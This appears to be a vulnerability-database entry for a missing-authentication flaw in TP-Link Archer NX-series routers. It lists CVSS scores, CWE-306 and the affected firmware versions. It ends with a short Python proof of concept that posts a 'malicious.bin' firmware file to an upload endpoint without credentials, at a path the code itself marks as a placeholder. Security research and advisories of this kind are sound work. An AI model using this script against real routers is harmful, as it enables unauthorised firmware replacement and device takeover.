Security Vulnerability Report
CVE-2025-15517 CVSS 8.1 HIGH


Published: 2026-03-23 18:16:22
Last Modified: 2026-03-31 19:08:34
Source: f23511db-6c3e-4e32-a477-6aa17d310630

Description

A missing authentication check in the HTTP server on the TP-Link Archer NX200, NX210, NX500 and NX600 allows unauthenticated access to certain CGI endpoints that are intended for authenticated users only. An attacker on the adjacent network can therefore perform privileged HTTP actions without credentials, including firmware upload and configuration changes.

CVSS Details

CVSS 3.1 (primary): base score 8.1, severity HIGH
Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N (exploitability 2.8, impact 5.2)
CVSS 4.0 (secondary, source f23511db-6c3e-4e32-a477-6aa17d310630): base score 8.6, severity HIGH
Vector: CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
Weakness: CWE-306 (Missing Authentication for Critical Function)

Configurations (Affected Products)

Each pair below is one match node of the record: the firmware CPE is the vulnerable component, and the hardware CPE it is combined with is the platform it runs on. The hardware entries are marked NOT VULNERABLE only because they are the running-on component of the match, not because that hardware revision is safe. The version thresholds come from the record's versionEndExcluding fields.

cpe:2.3:o:tp-link:archer_nx600_firmware:*:*:*:*:*:*:*:* - VULNERABLE (versions before 1.3.0)
cpe:2.3:h:tp-link:archer_nx600:3.0:*:*:*:*:*:*:* - NOT VULNERABLE (running on)
cpe:2.3:o:tp-link:archer_nx500_firmware:*:*:*:*:*:*:*:* - VULNERABLE (versions before 1.5.0)
cpe:2.3:h:tp-link:archer_nx500:2.0:*:*:*:*:*:*:* - NOT VULNERABLE (running on)
cpe:2.3:o:tp-link:archer_nx210_firmware:*:*:*:*:*:*:*:* - VULNERABLE (versions before 1.3.0)
cpe:2.3:h:tp-link:archer_nx210:3.0:*:*:*:*:*:*:* - NOT VULNERABLE (running on)
cpe:2.3:o:tp-link:archer_nx200_firmware:*:*:*:*:*:*:*:* - VULNERABLE (versions before 1.3.0)
cpe:2.3:h:tp-link:archer_nx200:3.0:*:*:*:*:*:*:* - NOT VULNERABLE (running on)
cpe:2.3:o:tp-link:archer_nx600_firmware:*:*:*:*:*:*:*:* - VULNERABLE (version threshold for the hardware 2.0 pairing is truncated in the record)
cpe:2.3:h:tp-link:archer_nx600:2.0:*:*:*:*:*:*:* - NOT VULNERABLE (running on)
TP-Link Archer NX200
TP-Link Archer NX210
TP-Link Archer NX500
TP-Link Archer NX600

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Exploit Title: TP-Link Archer NX Series Auth Bypass (CVE-2025-15517)
# Description: Uploads a malicious firmware file without authentication.

# Target configuration
target_ip = "192.168.0.1"              # Replace with the router's IP address
endpoint = "/cgi-bin/upload_firmware"  # Vulnerable endpoint placeholder
url = f"http://{target_ip}{endpoint}"

try:
    # Prepare the malicious firmware file; the with-block closes the handle afterwards
    with open("malicious.bin", "rb") as fw:
        files = {"firmware": ("malicious.bin", fw, "application/octet-stream")}
        # Send POST request without authentication headers
        print(f"[*] Sending exploit payload to {url}...")
        response = requests.post(url, files=files, timeout=10)

    # Check response
    if response.status_code == 200:
        print("[+] Exploit successful! Firmware uploaded.")
    else:
        print(f"[-] Exploit failed. Server returned: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[!] An error occurred: {e}")
```

References
